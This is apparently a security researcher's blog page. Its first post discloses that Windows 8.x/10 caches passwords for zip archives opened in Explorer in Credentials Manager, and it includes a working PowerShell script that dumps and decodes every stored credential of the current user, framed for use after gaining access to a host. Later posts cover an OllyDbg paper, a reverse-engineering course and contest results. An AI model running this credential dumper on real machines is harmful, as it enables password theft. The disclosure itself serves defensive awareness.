Credentials Manager – Zip Passwords Caching [Win8.x/10]

tl;dr: When you open a password-protected zip archive using Windows Explorer on Windows 8.x/10, the password is automatically cached in the Credentials Manager for the life of the logon session.

This does not apply to earlier Windows versions, at least not by default, and it is apparently a ‘feature’ that aims to favor usability. In a few words… “if you have opened a protected zip archive once using Windows Explorer, then what the hell…, let me cache that password for you so you don’t need to enter it again during that logon session”. Holy crap!!!

If you share the same account on a Windows host with one of those versions installed and you open password-protected zip archives with (…ahem) sensitive data using Windows Explorer, then rest assured that if you don’t log off, anyone using your computer can easily get those passwords: the cached entry lives in your user’s Credentials Manager until the logon session ends, and reading it needs no elevation, only code running as you. So you are basically fucked!
If you are an ethical hacker and you just gained access to a host running Windows 8.x/10, then you might get really lucky, since people love re-using the same passwords for different things. Just keep in mind that the cache is per logon session, so your code has to run inside the session of the user who opened the archive, not as some other account.
So they are basically fucked!

Example:

The code to do this is ridiculously simple as well…
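The following PowerShell script is an added example, not the code from the original post. It calls CredEnumerateW through P/Invoke to list every Credentials Manager entry of the current user and decode the secret blob. The post does not say which target name Windows Explorer uses for zip archives, so the script does not filter on it; it prints the Persist field instead, and a password cached for the logon session shows up as a SESSION entry. It assumes the blob is a UTF-16LE string (falling back to hex otherwise) and it must be run inside the logon session of the user who opened the archive, since Credentials Manager is per user.

```powershell
# Added example (not the post's original code): dump the current user's
# Credentials Manager entries via CredEnumerateW. No admin rights needed,
# but it must run as the user whose logon session holds the cached password.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public static class CredMan
{
    // Mirrors the native CREDENTIALW layout (advapi32 / wincred.h).
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct CREDENTIAL
    {
        public uint   Flags;
        public uint   Type;
        public IntPtr TargetName;
        public IntPtr Comment;
        public System.Runtime.InteropServices.ComTypes.FILETIME LastWritten;
        public uint   CredentialBlobSize;
        public IntPtr CredentialBlob;
        public uint   Persist;
        public uint   AttributeCount;
        public IntPtr Attributes;
        public IntPtr TargetAlias;
        public IntPtr UserName;
    }

    [DllImport("advapi32.dll", EntryPoint = "CredEnumerateW", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool CredEnumerate(string filter, uint flags, out uint count, out IntPtr credentials);

    [DllImport("advapi32.dll", EntryPoint = "CredFree")]
    public static extern void CredFree(IntPtr buffer);
}
"@

# CRED_PERSIST_* and CRED_TYPE_* values from wincred.h
$persistNames = @{ 1 = 'SESSION'; 2 = 'LOCAL_MACHINE'; 3 = 'ENTERPRISE' }
$typeNames    = @{ 1 = 'GENERIC'; 2 = 'DOMAIN_PASSWORD'; 3 = 'DOMAIN_CERTIFICATE'; 4 = 'DOMAIN_VISIBLE_PASSWORD' }
function Name($table, $value) { if ($table.ContainsKey([int]$value)) { $table[[int]$value] } else { "$value" } }

$count  = [uint32]0
$pCreds = [IntPtr]::Zero
if (-not [CredMan]::CredEnumerate($null, 0, [ref]$count, [ref]$pCreds)) {
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    if ($err -eq 1168) { Write-Host 'No credentials stored for this user.'; return }   # ERROR_NOT_FOUND
    throw "CredEnumerate failed: Win32 error $err"
}

try {
    for ($i = 0; $i -lt $count; $i++) {
        # CredEnumerate returns an array of PCREDENTIAL: read the i-th pointer, then the struct behind it.
        $pCred = [Runtime.InteropServices.Marshal]::ReadIntPtr($pCreds, $i * [IntPtr]::Size)
        $cred  = [Runtime.InteropServices.Marshal]::PtrToStructure($pCred, [type][CredMan+CREDENTIAL])

        $target = [Runtime.InteropServices.Marshal]::PtrToStringUni($cred.TargetName)
        $user   = if ($cred.UserName -ne [IntPtr]::Zero) { [Runtime.InteropServices.Marshal]::PtrToStringUni($cred.UserName) } else { '' }

        $secret = ''
        if ($cred.CredentialBlobSize -gt 0) {
            $blob = New-Object byte[] $cred.CredentialBlobSize
            [Runtime.InteropServices.Marshal]::Copy($cred.CredentialBlob, $blob, 0, $blob.Length)
            # Assumption: the blob is a UTF-16LE string. Anything that does not decode
            # to printable text is shown as hex so binary blobs are not misread.
            $secret = [Text.Encoding]::Unicode.GetString($blob).TrimEnd([char]0)
            if ($secret -match '[^\u0020-\u007E]') {
                $secret = 'hex:' + (($blob | ForEach-Object { $_.ToString('x2') }) -join '')
            }
        }

        [pscustomobject]@{
            Target  = $target
            User    = $user
            Type    = Name $typeNames    $cred.Type
            Persist = Name $persistNames $cred.Persist     # SESSION = gone at logoff, which is the zip case
            Secret  = $secret
        }
    }
} finally {
    # The whole array (pointers and structs) is one allocation owned by advapi32.
    [CredMan]::CredFree($pCreds)
}
```

Run it from a normal (non-elevated) PowerShell prompt in the same logon session, right after opening a protected archive in Explorer, and compare the output with the same command after logging off and on again: the SESSION entries are the ones that disappear, which is exactly the behaviour the tl;dr describes.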

Old Dog – New Tricks

It’s been a while since I had some free time to write something about my personal research. Well, free time is not our strong suit anymore, that’s for sure.

Finally, I managed to put some things together and release a paper about recent research I performed on the new version of Olly, v2.01.

Get me there!

Have fun!
kyREcon

eLearnSecurity – ARES

After working closely with eLearnSecurity for more than a year, I am happy to announce that the ARES course is about to be released on the 24th of September 2013.

This course is made for people who want to dive into the world of Software Reverse Engineering, either driven by curiosity or by the will to work professionally on that subject.
The course is highly recommended for anyone who wants to work in the IT Security industry, either as a malware analyst or as a vulnerability researcher and exploit writer.
Furthermore, software developers will also benefit from this course, which gives insight into the internal operations that take place during the execution of an application, and also shows how to locate an algorithm and analyze it for various purposes, either for Reverse Engineering or for bug hunting.

An interactive webinar will take place on Tuesday, 24 September 2013, where we will talk about the course, answer some questions and also give a short demonstration of what this course is really about.

You may click on the following links to subscribe to the upcoming webinar for free and to download the syllabus of the ARES course.

Links:

Webinar – Finished –

ARES Syllabus

Enjoy,
kyREcon

AthCon 2013 RE Challenge Results

Once again the pre-AthCon contest was completed successfully. The organizers decided to keep the names of the people who solved the RE challenge private until the beginning of AthCon 2013.

The following people submitted a valid solution before the deadline, in that order. We post their names the way they asked to be mentioned.

1. Vladimir U. aka OKOB (Ukraine) – Claimed the Amazon Voucher…and got it :0)

2. @trapflag

3. Dany Zatuchna – Claimed the Athcon 2013 ticket…and got it :0)

4. Στέλιος Τσαμπάς (Stelios Tsampas)

The authors of this challenge would like to thank all the people who dedicated some of their time to this challenge, as well as those who helped to spread the word by any means. It really means a lot to us.

Enjoy,
kyREcon

All Rights R3v3rs3d